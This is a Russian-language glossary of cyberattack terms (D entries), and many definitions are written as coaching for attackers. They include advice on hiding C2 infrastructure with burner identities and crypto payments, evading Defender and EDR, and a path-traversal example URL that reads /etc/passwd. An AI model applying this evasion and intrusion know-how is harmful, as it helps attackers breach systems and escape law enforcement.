Deanonymization Деанонимизация: процесс установления реальной личности за анонимным аккаунтом, IP-адресом, транзакцией. Методы: корреляция активности во времени, анализ метаданных, ошибки OPSEC, использование law enforcement (subpoena к провайдерам). Deanonymization главный риск для атакующего. Handala была деанонимизирована частично (связь с MOIS), но конкретные операторы остаются неизвестными.

Death Threats Смертельные угрозы, используемые как эскалация в вымогательстве. Handala отправляла смертельные угрозы жертвам, утверждая, что их адреса переданы картелю CJNG с наградой $250,000 за убийство. Death threats переводят киберпреступность в категорию терроризма, что привлекает максимальное внимание law enforcement (FBI SWAT, Joint Terrorism Task Forces).

Debian Дистрибутив Linux, известный стабильностью. Debian используется для серверов, в том числе для C2, эксфильтрации, прокси. Для атакующего Debian надежная ОС, но требует настройки (скрытие логов, удаление истории команд, шифрование диска).

Decentralized Децентрализованный: без единого центра управления. The Com децентрализованная сеть, что делает ее устойчивой к арестам (убирают одного остальные продолжают). DeFi децентрализованные финансы, где нет центрального посредника. Для атакующего децентрализованные структуры сложнее атаковать (нет единой точки отказа), но и сложнее защищать.

Decryption Расшифровка: процесс преобразования зашифрованных данных в исходные. В контексте атак decryption требуется: для расшифровки файлов жертвы (если выкуп заплачен), для чтения перехваченного трафика (если есть ключи), для анализа зашифрованной малвари. Атакующие избегают ситуаций, где требуется decryption с неизвестным ключом.

Dedicated Server Выделенный сервер (физический) в дата-центре. Используется для C2, эксфильтрации, hosting leak sites. Dedicated server предпочтительнее VPS для чувствительных операций, потому что VPS может быть снимком (snapshot) и передан law enforcement без физического доступа. Оплата криптовалютой, регистрация через burner identity.

Deep Packet Inspection (DPI) Глубокий анализ пакетов: проверка содержимого (не только заголовков) для выявления угроз, блокировки протоколов. DPI используется провайдерами для блокировки Tor, VPN, и C2-трафика. Для обхода DPI атакующие используют: шифрование (TLS), обфускацию трафика (malleable C2), tunneling через легитимные протоколы (DNS, WebSocket).

Deep Web Часть интернета, не индексируемая поисковыми системами: динамические страницы, закрытые форумы, корпоративные порталы, базы данных. Deep web не требует специальных сетей (в отличие от dark web). Для OSINT deep web может содержать: внутренние документы, утекшие пароли, закрытые обсуждения.

Deepfake Сгенерированные AI видео, аудио, изображения, выглядящие как реальные. Deepfake используется для: vishing (имитация голоса руководителя), BEC (видеозвонок от имени гендиректора), deepfake KYC (создание synthetic identity), дезинформации. Handala могла бы использовать deepfake для усиления угроз, но в их атаках deepfake не зафиксирован.

Deepfake KYC Подделка процедуры "знай своего клиента" (Know Your Customer) с использованием deepfake. Атакующий создает AI-сгенерированное лицо (StyleGAN), поддельные документы (паспорт, водительские права), и проходит проверку KYC на бирже или в банке, чтобы открыть счет для отмывания денег. Deepfake KYC стандарт в лаундеринг-цепочках.

Deepfake Voice Голосовой deepfake: синтез голоса конкретного человека (гендиректора, сотрудника IT) для vishing. Deepfake voice может быть создан из короткого образца (10-30 секунд) из YouTube, корпоративных презентаций, записей звонков. Используется для: звонков в helpdesk (имитация сотрудника, просящего сбросить MFA), BEC (звонок бухгалтеру с просьбой перевести деньги).

Defacement Подмена содержимого веб-сайта (взлом и замена главной страницы). Defacement используется: хактивистами для продвижения сообщений (Anonymous, Handala), для демонстрации уязвимости, для репутационного ущерба. Handala defacement не делала, сосредоточившись на data destruction.

Default Credentials Учетные записи по умолчанию (admin/admin, root/root, user/user), которые не были изменены при установке оборудования или ПО. Default credentials low-hanging fruit в атаках на IoT, маршрутизаторы, камеры, промышленные контроллеры. В корпоративной сети default credentials могут быть на: принтерах, IP-камерах, UPS, сетевых хранилищах. MuddyWater эксплуатировал default credentials на камерах Hikvision для доступа к израильским объектам.

Defender (Microsoft Defender) Встроенный антивирус Windows (ранее Windows Defender). В 2026 Defender включает: AV, EDR (Microsoft Defender for Endpoint), ASR (Attack Surface Reduction), AMSI. Defender один из самых распространенных антивирусов в корпоративной среде. Для атакующего Defender требует: AMSI bypass, ETW unhooking, direct syscalls, отключение через реестр (если есть права), или использование LOLBins, которые Defender не блокирует.

Defense Evasion Обход защиты: техники, позволяющие атакующему оставаться незамеченным. Включает: отключение антивируса, очистка логов, использование легитимных инструментов (LOLBins), memory-only payloads, шифрование трафика, маскировка под легитимные процессы. Defense evasion непрерывный процесс на всех этапах атаки.

Defense in Depth Стратегия эшелонированной защиты: несколько слоев защиты (firewall, IDS/IPS, EDR, SIEM, data encryption), чтобы компрометация одного слоя не означала компрометацию всей системы. Для атакующего defense in depth означает, что нужно обходить или отключать несколько механизмов защиты. Handala обошла defense in depth Stryker, атакуя Intune (слой управления устройствами), который имел широкие права и не был защищен должным образом.

DeFi (Decentralized Finance) Децентрализованные финансы: финансовые приложения на блокчейне (кредитование, обмен, стейкинг, флеш-кредиты), работающие без центральных посредников. DeFi уязвим к: flash loan attacks (флеш-кредиты для манипуляции рынком), oracle manipulation (манипуляция источниками цен), reentrancy (повторный вход), logic flaws в смарт-контрактах. Bybit $1.5B (через supply chain), Venus $3.7M (flash loan) примеры.

DeFi Bridge Крипто-бридж, соединяющий разные блокчейны (например, Ethereum и BSC). DeFi Bridge цель атак: Ronin Bridge ($600M), Wormhole ($320M), Nomad ($190M). Атаки на бриджи используют: уязвимости в валидаторах, flash loan, reentrancy. Бриджи хранят миллиарды долларов в смарт-контрактах, что делает их привлекательными.

DeFi Oracle Оракул цен (Chainlink, Band, TWAP), предоставляющий смарт-контрактам данные о ценах активов. Oracle manipulation атака, при которой злоумышленник временно искажает цену актива (через flash loan или манипуляцию на DEX), чтобы воспользоваться этим в уязвимом протоколе. Venus $3.7M атака через oracle manipulation.

DeFi Protocol Смарт-контракт, реализующий финансовую логику (Aave, Compound, Uniswap, Curve). DeFi protocol уязвимы к: flash loan attacks, reentrancy, arithmetic overflow/underflow, access control flaws. Атаки на DeFi protocols одна из основных категорий в крипто-взломах.

Degaussing Уничтожение данных на магнитных носителях (жестких дисках, магнитных лентах) мощным магнитным полем. Degaussing делает данные невосстановимыми даже для лабораторий. В контексте атак degaussing метод, который могут использовать защитники для уничтожения улик, но не атакующие (дорогое оборудование).

Dehashed Сервис, позволяющий искать утекшие учетные данные (email, пароль) по базе данных утечек. Dehashed используется защитниками для проверки, не скомпрометированы ли учетные записи сотрудников. Для атакующего Dehashed угроза: если его учетные данные попали в утечку и он использовал их для операций, это может привести к деанонимизации.

DEK (Data Encryption Key) Ключ шифрования данных. В BitLocker, FileVault, LUKS DEK шифрует данные на диске. DEK может быть расшифрован с помощью ключа, хранящегося в TPM, в пароле пользователя, или в recovery key. Кража DEK (например, из памяти) позволяет расшифровать диск без пароля. Cold boot attack нацелен на извлечение DEK из памяти.

Delayed Execution Отложенное выполнение: техника, когда вредоносный код запускается не сразу, а через определенное время или после определенного события (загрузка системы, логин пользователя, подключение сети). Delayed execution используется для: обхода sandbox (sandbox не ждет 10 минут), обхода поведенческого анализа (аналитики могут не дождаться), создания впечатления легитимности.

Delphi Язык программирования, используемый для создания некоторых малварей (особенно в 2000-2010х). Delphi-малварь реже детектится современными антивирусами, потому что сигнатуры ориентированы на C/C++ и .NET. Однако Delphi считается устаревшим, и новые малвари редко пишутся на нем.

Demilitarized Zone (DMZ) Сеть, находящаяся между внутренней сетью и интернетом, содержащая публичные сервисы (web, mail, DNS). DMZ изолирована от внутренней сети межсетевыми экранами. Для атакующего компрометация сервера в DMZ первый шаг; нужно затем перейти во внутреннюю сеть через уязвимости в firewall, или используя сервер в DMZ как jump host.

Demographic Data Демографические данные (возраст, пол, доход, образование). Демографические данные часть PII (персональных данных). В утечках (Conduent, CarGurus) демографические данные могут быть использованы для: targeted phishing, создания synthetic identity, анализа уязвимостей.

Denial of Service (DoS) Отказ в обслуживании: атака, делающая сервис недоступным для легитимных пользователей. DoS может быть: сетевой (заполнение канала), прикладной (исчерпание ресурсов приложения), логический (эксплуатация бага, вызывающего краш). DDoS распределенный DoS с использованием ботнета.

Deobfuscation Деобфускация: процесс восстановления исходного кода из обфусцированной формы. Для атакующего деобфускация нужна при анализе чужой малвари или защитных механизмов. Инструменты: de4dot (для .NET), UnObfuscate, ручной анализ.

Department of Defense (DoD) Министерство обороны США. DoD управляет USCYBERCOM, финансирует исследования в области кибербезопасности (DARPA). Для атакующего DoD означает, что атака на оборонные подрядчики (Lockheed Martin, Raytheon) может привести к ответу на уровне национальной безопасности.

Department of Homeland Security (DHS) Министерство внутренней безопасности США, в структуру которого входит CISA (Cybersecurity and Infrastructure Security Agency). DHS отвечает за защиту критической инфраструктуры США, включая кибербезопасность, физическую безопасность границ, противодействие терроризму. DHS координирует операции по seizure доменов (вместе с DOJ, FBI) и реагирование на киберинциденты. В марте 2026 DHS столкнулся с shutdown, что ограничило возможности CISA. Для атакующего DHS означает, что атака на критическую инфраструктуру США может привести к ответу на уровне федерального правительства, включая преследование по всей юрисдикции США и экстрадицию.

Dependency Confusion Атака на цепочку поставок, при которой злоумышленник публикует пакет (библиотеку) с тем же именем, что и приватный пакет компании, в публичный репозиторий (npm, PyPI, Maven Central). Менеджер пакетов, если не настроен приоритет приватных репозиториев, может скачать публичную версию с более высоким номером версии, выполнив вредоносный код. Dependency confusion используется для компрометации CI/CD пайплайнов и production-сред. В 2026 остается актуальным для компаний, не настроивших правильно конфигурацию менеджеров пакетов.

Depository Хранилище данных: физическое (банковские сейфы, дата-центры) или цифровое (S3, Azure Blob). В контексте атак depository цель для эксфильтрации. Handala exfiltrated 50TB из Stryker, вероятно, из нескольких depository (базы данных, файловые серверы, Intune-managed storage).

Deprovisioning Процесс отзыва доступа у пользователя при увольнении или смене роли. Если deprovisioning выполнен не полностью (учетная запись осталась активной, не удалены SSH-ключи, не отозваны OAuth-токены), это создает уязвимость: бывший сотрудник или злоумышленник, получивший доступ к его учетным данным, может войти в систему. Для атакующего поиск не-deprovisioned аккаунтов часть post-exploitation.

Derivative Производный финансовый инструмент в DeFi. В контексте атак производные инструменты (опционы, фьючерсы, синтетические активы) могут иметь сложную логику смарт-контрактов, что увеличивает поверхность атаки. Атаки на derivative protocols могут быть более сложными, чем на простые swap-пулы.

Deserialization Процесс преобразования потока байтов (JSON, XML, бинарных данных) обратно в объект. Десериализация опасная операция, если данные не проверены: злоумышленник может создать специальный объект, который при десериализации выполнит произвольный код (RCE). CVE-2026-20963 (SharePoint RCE) десериализация недоверенных данных. Java (ObjectInputStream), .NET (BinaryFormatter), PHP (unserialize) особенно уязвимы. Для атакующего поиск уязвимостей десериализации один из путей к RCE.

Deserialization Attack Атака, использующая уязвимости в десериализации для выполнения произвольного кода, отказа в обслуживании (DoS), или повышения привилегий. Атакующий создает вредоносный сериализованный объект (гаджет-цепочку) и отправляет его приложению. При десериализации вызываются методы, которые приводят к выполнению команд. Известные цепочки: ysoserial (Java), ysoserial.net (.NET), PHPGGC (PHP). CVE-2026-20963 пример десериализационной атаки в SharePoint.

Desktop Рабочий стол (ПК, ноутбук). Desktop цель для: infostealer (кража данных), ransomware (шифрование), persistence (backdoor). В корпоративной среде desktops часто управляются через MDM (Intune, Jamf), что делает их уязвимыми к массовым атакам через MDM (Handala).

Destructive Attack Деструктивная атака, целью которой является нанесение ущерба (уничтожение данных, вывод систем из строя), а не получение выкупа. Destructive attacks используются: государственными акторами (Иран против Stryker), хактивистами (Anonymous), а также в качестве эскалации, если выкуп не заплачен. Handala пример destructive attack через Intune.

Destructive Malware Вредоносное ПО, предназначенное для уничтожения данных или вывода систем из строя. Включает: wiper (уничтожение данных), killer (уничтожение операционной системы), bricker (превращение устройства в "кирпич"). Destructive malware часто маскируется под ransomware, но не имеет механизма восстановления (ключи шифрования уничтожаются). NotPetya, WhisperGate, Handala примеры.

Detection Обнаружение: процесс выявления вредоносной активности (атак) с помощью: EDR (сигнатуры, поведенческий анализ), SIEM (корреляция событий), NDR (анализ сетевого трафика), threat hunting (ручной поиск). Для атакующего detection главный враг. Чем позже атака обнаружена, тем больше времени на достижение целей.

Detonation Исполнение (детонация) вредоносного образца в изолированной среде (sandbox) для анализа поведения. Sandbox (Cape, Cuckoo) запускает малварь, записывает системные вызовы, сетевые соединения, изменения в файловой системе. Для обхода детонации малварь использует: анти-сэндбокс техники (проверка на наличие виртуализации, задержки выполнения, проверка на взаимодействие с пользователем).

Dev (Developer) Разработчик. Dev цель supply chain атак: компрометация dev-аккаунта (GitHub, GitLab, Jira) может дать доступ к исходному коду, CI/CD пайплайнам, secrets. Bybit hack начался с компрометации dev-а Safe{Wallet} через фишинг с "job offer PDF". Dev-ы часто имеют повышенные привилегии (доступ к production, ключи шифрования), что делает их привлекательной целью.

DEV-0832 Обозначение Interlock (Microsoft). Microsoft присваивает DEV-префикс группам, за которыми следит. DEV-0832 (Interlock) известна использованием zero-day (CVE-2026-20131), memory-resident webshells, и агрессивным удалением логов.

DEV-1101 Обозначение Scattered Spider (Microsoft). DEV-1101 специализируется на vishing, атаках на helpdesk, MFA bypass, и использовании легитимных RMM-инструментов (AnyDesk, ScreenConnect).

Developer Разработчик (developer) специалист, создающий программное обеспечение. В контексте атак разработчик цель supply chain атак: компрометация dev-аккаунта (GitHub, GitLab, Jira) может дать доступ к исходному коду, CI/CD пайплайнам, secrets. Bybit hack начался с компрометации dev-а Safe{Wallet} через фишинг с "job offer PDF". Dev-ы часто имеют повышенные привилегии (доступ к production, ключи шифрования), что делает их привлекательной целью. Атаки на разработчиков: spear-phishing, vishing, инфостилеры, поддельные предложения о работе.

DevOps Методология, объединяющая разработку (Development) и эксплуатацию (Operations). DevOps пайплайны (CI/CD) цель supply chain атак: компрометация пайплайна позволяет внедрить малварь в production-код, украсть secrets (AWS-ключи, API-токены), эксфильтровать данные. Dependency confusion, compromise of build servers, malicious commits векторы атак на DevOps.

DevSecOps Интеграция безопасности в DevOps: автоматическое сканирование кода, проверка конфигураций, сканирование образов контейнеров. Для атакующего DevSecOps означает, что простые уязвимости (hardcoded secrets, SQL injection) могут быть обнаружены на этапе сборки. Нужно атаковать на более глубоком уровне (пайплайн, зависимости).

DEX (Decentralized Exchange) Децентрализованная биржа (Uniswap, PancakeSwap, Curve), где обмен происходит напрямую между пользователями через смарт-контракты, без центрального посредника. DEX используются для: обмена украденной криптовалюты (миксер), отмывания средств (через множество мелких обменов), манипуляции ценами (flash loan). В лаундеринг-цепочке DEX этап после миксера.

DFIR (Digital Forensics and Incident Response) Цифровая криминалистика и реагирование на инциденты. DFIR процесс: сбор доказательств (образы дисков, дампы памяти), анализ (поиск артефактов), восстановление систем, расследование. Для атакующего DFIR угроза: если оставлены следы (логи, временные файлы, метаданные), DFIR может восстановить хронологию атаки и идентифицировать атакующего. Поэтому атакующий чистит логи, работает в памяти, использует анти-форензик техники.

DFS (Distributed File System) Распределенная файловая система Microsoft, позволяющая объединять файловые ресурсы с разных серверов в единое пространство имен. DFS может быть целью для атакующего: компрометация DFS-сервера дает доступ к файловым ресурсам всей организации.

DGA (Domain Generation Algorithm) Алгоритм генерации доменных имен, используемый малварью для C2. Малварь генерирует список доменов (например, на основе текущей даты) и пытается соединиться с каждым, пока не найдет активный. DGA делает невозможным предсказание C2-доменов и блокировку всех вариантов. Conficker, Kraken, Locky примеры малвари с DGA. Для атакующего DGA способ повысить resilience к takedown.

DHCP (Dynamic Host Configuration Protocol) Протокол автоматической настройки IP-адресов. Атаки на DHCP: DHCP starvation (исчерпание пула адресов), rogue DHCP server (подмена легитимного DHCP-сервера для перенаправления трафика), DHCP spoofing. Rogue DHCP server используется для MITM (man-in-the-middle) в локальных сетях.

DHCP Starvation Исчерпание пула IP-адресов DHCP-сервера: атакующий отправляет множество DHCP-запросов с поддельными MAC-адресами, пока сервер не исчерпает все доступные адреса. Новые легитимные устройства не могут получить IP. DHCP starvation используется для DoS и как часть атаки rogue DHCP server (после исчерпания пула, атакующий запускает свой DHCP-сервер).

DHS (Department of Homeland Security) Министерство внутренней безопасности США (Department of Homeland Security). DHS отвечает за: защиту критической инфраструктуры, кибербезопасность (CISA в составе DHS), физическую безопасность границ, противодействие терроризму. DHS координирует операции по seizure доменов (вместе с DOJ, FBI) и реагирование на киберинциденты. В марте 2026 DHS столкнулся с shutdown, что ограничило возможности CISA.

DI (Digital Identity) Цифровая идентичность: набор данных, однозначно идентифицирующих пользователя в цифровом пространстве (логин, email, номер телефона, биометрия, документы). Для атакующего кража digital identity (fullz) позволяет: выдавать себя за жертву, открывать счета (synthetic identity), совершать покупки, уходить от ответственности.

Dia (Diagram) Диаграмма. В контексте атак диаграммы используются для: визуализации сети (nmap, Zenmap), анализа attack paths (BloodHound), планирования lateral movement. BloodHound использует графы для отображения связей в AD.

Diagrams См. Dia. Dia диаграмма. В контексте атак диаграммы используются для: визуализации сети (nmap, Zenmap), анализа attack paths (BloodHound), планирования lateral movement, документирования инфраструктуры. BloodHound использует графы для отображения связей в AD. Для атакующего построение диаграмм сети помогает понять структуру организации, найти критические узлы, спланировать маршруты движения.

Diamond Model Модель анализа кибератак, описывающая четыре основные компоненты: adversary (атакующий), capability (возможности), infrastructure (инфраструктура), victim (жертва). Diamond model используется threat intelligence для сопоставления атак, выявления паттернов. Для атакующего понимание diamond model помогает: не повторять TTPs, менять инфраструктуру, избегать связей между операциями.

Dictionary Attack Атака перебором по словарю: подбор пароля на основе словаря распространенных паролей (rockyou.txt, SecLists). В отличие от брутфорса (перебор всех комбинаций), dictionary attack использует список вероятных паролей, что быстрее. Dictionary attack эффективна против слабых паролей ("password123", "admin", "company2024").

Diffie-Hellman Протокол обмена ключами, позволяющий двум сторонам создать общий секретный ключ через незащищенный канал. Уязвимости: использование слабых простых чисел (Logjam), отсутствие аутентификации (MITM), реализация (библиотеки). В 2026 Diffie-Hellman с 2048-битными простыми числами считается безопасным, но legacy-системы могут использовать 1024-битные, уязвимые для атак.

Digital Certificate Цифровой сертификат (X.509), используемый для TLS, подписи кода, аутентификации. Сертификат содержит: публичный ключ, информацию о владельце, подпись удостоверяющего центра. Кража digital certificate (приватного ключа) позволяет: расшифровывать TLS-трафик, подписывать малварь, выдавать себя за легитимный сервис.

Digital Forensics Цифровая криминалистика: наука о сборе, сохранении, анализе цифровых доказательств. Для атакующего digital forensics означает, что нужно минимизировать следы: чистить логи, работать в памяти, не оставлять файлов, использовать шифрование, уничтожать временные данные.

Digital Identity См. DI. DI (Digital Identity) цифровая идентичность: набор данных, однозначно идентифицирующих пользователя в цифровом пространстве (логин, email, номер телефона, биометрия, документы). Для атакующего кража digital identity (fullz) позволяет: выдавать себя за жертву, открывать счета (synthetic identity), совершать покупки, уходить от ответственности. Цифровая идентичность может быть восстановлена из утечек PII (Conduent, Wynn) и инфостилеров.

Digital Signature Электронная подпись: результат криптографического преобразования данных с использованием приватного ключа, подтверждающий подлинность и целостность. Цифровая подпись используется для: подписи кода (code signing), TLS-сертификатов, документов. Подделка цифровой подписи (через коллизии хэшей, кражу ключей) позволяет атакующему выдавать себя за доверенное лицо.

DigitalOcean Cloud-провайдер, популярный среди атакующих для хостинга C2, эксфильтрации, прокси. DigitalOcean принимает криптовалюту, не требует жесткой верификации, что делает его привлекательным для burner VPS. Однако DigitalOcean сотрудничает с law enforcement по запросу, поэтому важно использовать nested onion, шифрование диска, burner identity.

Diod (Data Diode) Устройство или программный компонент, обеспечивающий однонаправленную передачу данных между сетями. Физически data diode реализована как оптическое устройство: данные передаются через световой луч от передатчика к приемнику, но обратный канал отсутствует (физически нет соединения). Это гарантирует, что информация может покинуть защищенную сеть (например, OT-сеть промышленного объекта), но не может проникнуть в нее из внешней сети. Data diode используется для: передачи логов из критических систем в SIEM без риска взлома в обратную сторону, мониторинга состояния промышленных контроллеров без возможности удаленного управления, экспорта данных из изолированных сетей (air-gapped) для аналитики. Для атакующего data diode серьезное препятствие. Даже если он скомпрометирует IT-сеть организации, он не сможет напрямую отправить команды в OT-сеть, защищенную data diode. Обход data diode требует: физического доступа к OT-сети (через tailgating, USB-дропы), использования уязвимостей в самом устройстве data diode (если оно имеет программные компоненты), или атаки на персонал, имеющий доступ к OT-сети (социальная инженерия). В промышленных средах (энергетика, водоснабжение, химическое производство) data diode стандарт защиты, но часто не внедрен из-за сложности и стоимости. Handala не сталкивалась с data diode при атаке на Stryker, потому что атаковала через Intune облачную платформу управления устройствами, которая имела прямой доступ ко всем устройствам без однонаправленных ограничений.

Direct Syscalls Прямые системные вызовы: обращение к ядру операционной системы напрямую, минуя стандартные API (ntdll.dll в Windows). Стандартные API имеют хуки, установленные EDR (CrowdStrike, SentinelOne) для мониторинга. Direct syscalls обходят эти хуки, позволяя выполнять операции (открытие процессов, запись в память, создание потоков) без детекции. Реализуются через ассемблерные инструкции (syscall в Windows, sysenter в Linux) или через библиотеки (SysWhispers, Halo's Gate). Direct syscalls стандарт evasion.

Directory Traversal Уязвимость, позволяющая читать файлы за пределами веб-корня, используя последовательности "../" (path traversal). Пример: https://site.com/getfile?file=../../../../etc/passwd. Directory traversal используется для кражи файлов конфигурации (.env, config.php), исходного кода, паролей. В 2026 встречается в старых приложениях, IoT-панелях.

Dirty COW Уязвимость ядра Linux (CVE-2016-5195), позволяющая локальному пользователю повысить привилегии до root через race condition в механизме copy-on-write. Dirty COW классический LPE (Local Privilege Escalation) для старых ядер. В 2026 актуальна для систем, которые не обновлялись годами (промышленные контроллеры, медицинские устройства).

Disassembler Дизассемблер: программа для преобразования машинного кода в ассемблерный код (IDA Pro, Ghidra, Binary Ninja). Дизассемблеры используются для: reverse engineering малвари, поиска уязвимостей, анализа защитных механизмов. Для атакующего дизассемблер инструмент для понимания того, как работает софт, который нужно взломать.

Disclosure Раскрытие информации: процесс публикации информации об уязвимости. Disclosure может быть: ответственным (responsible disclosure уязвимость сообщается вендору, исправляется, затем публикуется), полным (full disclosure уязвимость публикуется сразу), или несанкционированным (утечка). Для атакующего disclosure означает, что уязвимость может стать публичной, что приведет к патчу и уменьшению окна для эксплуатации.

Disinformation Дезинформация: намеренное распространение ложной информации для влияния на общественное мнение, создания хаоса, подрыва доверия. Иран использует disinformation как часть гибридной войны (вместе с кибератаками и кинетическими ударами). Для атакующего disinformation может быть инструментом для отвлечения внимания или психологического давления на жертв.

Disk Encryption Шифрование диска (BitLocker, FileVault, LUKS). Disk encryption защищает данные при физической краже устройства. Для атакующего disk encryption препятствие, если устройство выключено (данные зашифрованы). Если устройство включено, ключи находятся в памяти, и могут быть извлечены (cold boot attack, memory dump). В атаках на организации disk encryption может быть отключена через MDM (Intune) или групповые политики, если есть права администратора.

Disk Wipe Безвозвратное уничтожение данных с носителя (data wiping), делающее восстановление информации невозможным (или крайне сложным и дорогим). В отличие от простого удаления файла (который лишь помечает пространство как свободное), disk wipe перезаписывает сектора случайными данными (однократно или многократно), или использует команды SSD/NVMe (ATA Secure Erase, NVMe Format) для аппаратного сброса. В контексте атак disk wipe деструктивная операция, цель которой не выкуп, а нанесение максимального ущерба, disruption, уничтожение улик. Handala использовала disk wipe через Microsoft Intune: массовая команда factory reset уничтожила 200,000 устройств Stryker. Wiper-атаки (NotPetya, WhisperGate, Handala) являются формой disk wipe.

Disruptive Нарушающий работу (disruptive attack). Цель disruptive attack остановить бизнес-процессы, вызвать хаос, нанести репутационный ущерб. Handala атаковала Stryker с disruptive целью (остановка производства, сбои в экстренной медицинской помощи). В отличие от ransomware, где цель выкуп, disruptive attack может быть самоцелью (государственные акторы).

Distributed Распределенный. Распределенные системы (блокчейн, ботнеты, C2) устойчивее к централизованным атакам (takedown), потому что нет единой точки отказа. The Com распределенная сеть; Handala распределенная инфраструктура (несколько доменов, Telegram-каналов). Для атакующего распределенная инфраструктура способ повысить resilience.

Distributed Denial of Service (DDoS) Распределенная атака на доступность, когда множество устройств (ботнет) одновременно отправляют запросы к цели, перегружая ее ресурсы (сеть, CPU, память, соединения). DDoS используется для: disruption (отвлечение внимания), extortion (вымогательство: заплатите, иначе атака продолжится), отвлечения защитников во время основной атаки (как прикрытие). Типы: сетевой (SYN flood, UDP flood, ICMP flood), прикладной (HTTP flood, Slowloris), амплификационный (DNS, NTP, SSDP). В 2026 DDoSaaS (DDoS as a Service) доступен за $50-$500 в месяц. Для атакующего DDoS инструмент давления.

DLL (Dynamic Link Library) Библиотека динамической компоновки Windows, содержащая код и данные, используемые несколькими приложениями одновременно. DLL используются для: code injection (внедрение кода в процесс), DLL hijacking (подмена легитимной DLL), DLL sideloading (загрузка DLL доверенным приложением). Для атакующего DLL механизм persistence, evasion, и lateral movement.

DLL Hijacking Замена легитимной DLL на вредоносную путем помещения ее в каталог, где приложение ищет DLL перед системными путями (DLL search order hijacking). Приложение загружает вредоносную DLL вместо легитимной, выполняя код атакующего. DLL hijacking используется для persistence (замена DLL, которую загружает часто используемое приложение) и evasion (код выполняется в легитимном процессе).

DLL Injection Внедрение вредоносной DLL в адресное пространство другого процесса. Методы: CreateRemoteThread (выделение памяти, запись пути к DLL, создание удаленного потока, вызывающего LoadLibrary), SetWindowsHookEx (установка хука, который загружает DLL в процессы с сообщениями), через очереди APC. DLL injection используется для сокрытия активности (код выполняется в легитимном процессе) и обхода firewall (процесс имеет разрешенные сетевые правила).

DLL Sideloading Подгрузка вредоносной DLL легитимным приложением, которое ожидает найти DLL рядом с собой (в той же папке) или в указанном пути. Атакующий помещает вредоносную DLL в папку с легитимным приложением, и приложение загружает ее при запуске. DLL sideloading используется для: обхода AppLocker (приложение доверенное), evasion (код выполняется в доверенном процессе), persistence (приложение запускается регулярно).

DMARC (Domain-based Message Authentication, Reporting & Conformance) Стандарт аутентификации email, позволяющий проверять, что письмо действительно пришло с домена, который указан в From. DMARC использует SPF (Sender Policy Framework) и DKIM (DomainKeys Identified Mail) для проверки. Для атакующего DMARC препятствие при отправке фишинговых писем: если у домена жертвы настроен DMARC с политикой reject, письма с поддельного адреса будут отклонены. Поэтому атакующие регистрируют похожие домены (typosquatting) или используют скомпрометированные легитимные аккаунты.

DMZ (Demilitarized Zone) Сеть, находящаяся между внутренней сетью (LAN) и интернетом, содержащая публичные сервисы (web, mail, DNS). DMZ изолирована от внутренней сети межсетевыми экранами (firewall). Правила firewall разрешают: интернет DMZ (доступ к публичным сервисам), DMZ LAN (ограниченно, обычно только ответы на запросы), LAN DMZ (администрирование). Для атакующего компрометация сервера в DMZ первый шаг; нужно затем перейти во внутреннюю сеть через уязвимости в firewall, или используя сервер в DMZ как jump host.

DNAT (Destination NAT) Трансляция адресов назначения (Destination Network Address Translation) в межсетевых экранах. DNAT используется для: перенаправления трафика из интернета на внутренние серверы, скрытия реальных IP-адресов. Для атакующего DNAT может быть препятствием: нужно понять, куда реально направляется трафик, чтобы атаковать целевой сервер, а не межсетевой экран.

DND (Do Not Disturb) Режим "не беспокоить" на телефоне. Для vishing-атак DND препятствие: звонок может не дойти до жертвы. Атакующие могут использовать: звонки на рабочие телефоны (где DND не включен), звонки через Teams/Slack (где нет DND), или отправку сообщений (SMS, Telegram) с просьбой перезвонить.

DNS (Domain Name System) Система доменных имен, преобразующая имена (google.com) в IP-адреса. DNS используется для: C2 (DNS-туннели), эксфильтрации (кодирование данных в DNS-запросах), рекогносцировки (поиск поддоменов), атак (DNS poisoning, DNS amplification). DNS-трафик редко блокируется, что делает его привлекательным каналом для скрытой коммуникации.

DNS C2 C2 (Command and Control) через DNS-протокол. Агент отправляет DNS-запросы на контролируемый атакующим домен, кодируя команды и данные в поддоменах (например, data.attacker.com). Сервер отвечает DNS-ответами, содержащими команды. DNS C2 сложно обнаружить, потому что DNS-трафик легитимен и часто не фильтруется глубоко. Недостаток: низкая пропускная способность.

DNS Exfiltration Вывоз данных через DNS-запросы. Данные кодируются в поддоменах (например, chunk1.data.attacker.com, chunk2.data.attacker.com) и отправляются на DNS-сервер атакующего. DNS exfiltration используется для обхода DLP и firewall, потому что DNS-трафик часто не проверяется. Ограничение: размер одного DNS-запроса ограничен (255 байт), поэтому данные отправляются частями.

DNS Poisoning Отравление DNS-кэша: внедрение ложных DNS-записей в кэш DNS-сервера. Пользователи, использующие этот DNS-сервер, попадают на фейковый сайт вместо легитимного. DNS poisoning используется для: фишинга (подмена банковских сайтов), распространения малвари (перенаправление на сайты с эксплойтами), MITM. DNS poisoning требует уязвимости в DNS-сервере или возможности перехвата трафика (ARP poisoning).

DNS Tunneling Туннелирование через DNS-протокол: передача произвольных данных (команды, результаты, файлы) в DNS-запросах и ответах. DNS tunneling используется для C2 и эксфильтрации, когда другие протоколы (HTTP, HTTPS) заблокированы. Инструменты: iodine, dnscat2, dns2tcp. DNS-туннель может быть обнаружен по аномальному объему DNS-трафика или длине запросов.

DNSpionage APT-группа (Иран, MOIS), известная использованием DNS-туннелей для C2 и атак на DNS-инфраструктуру. DNSpionage атаковала правительственные и телекоммуникационные цели на Ближнем Востоке. Название группы связано с их техникой: компрометация DNS-записей для перенаправления трафика.

DNSSEC (DNS Security Extensions) Расширения безопасности DNS, добавляющие цифровые подписи к DNS-записям, чтобы предотвратить DNS poisoning. DNSSEC подписывает записи с помощью криптографических ключей, позволяя клиентам проверять подлинность. Для атакующего DNSSEC препятствие для DNS poisoning и DNS spoofing. Однако DNSSEC внедрен не везде, особенно в корпоративных средах.

DO (DigitalOcean) Cloud-провайдер DigitalOcean, популярный среди атакующих для хостинга C2, эксфильтрации, прокси. DigitalOcean принимает криптовалюту, не требует жесткой верификации, что делает его привлекательным для burner VPS. Однако DigitalOcean сотрудничает с law enforcement по запросу, поэтому важно использовать nested onion, шифрование диска, burner identity. DigitalOcean предоставляет VPS (Droplets) по цене от $4/месяц.

Docker Платформа контейнеризации. Docker используется в CI/CD, production-средах, для C2 (запуск агентов в контейнерах). Атаки на Docker: container breakout (побег из контейнера на хост), атаки на образы (вредоносные образы, backdoor в базовых образах), атаки на Docker API (если открыт наружу). Supply chain атаки через Docker Hub: публикация образа с малварью, который скачивают разработчики.

